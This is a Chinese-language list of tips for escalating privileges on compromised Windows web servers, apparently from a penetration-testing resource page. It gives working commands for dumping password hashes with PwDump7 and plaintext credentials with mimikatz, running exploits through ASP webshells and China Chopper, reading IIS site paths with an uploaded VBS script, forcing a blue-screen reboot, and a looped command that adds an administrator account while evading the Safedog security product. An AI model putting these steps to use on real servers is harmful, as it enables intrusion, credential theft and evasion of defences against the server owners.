4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txt cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下 也可以用mimikatz直接抓明文 5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了 6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输 入替换的文件路径,下面清空双引号加增加用户的命令 7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名 了,使用命令net user administrator查看管理组的名字 8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变 9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后 用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功 10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe 11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录, 接着上传iispwd.vbs到网站根目录,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs 11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x 12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add(零基础)手工注入+burpsuite拿webshell
metasploit命令集
一次简单但又完整的先拿shell后提权的经历
渗透测试资料--提权技巧
相关主题
文本预览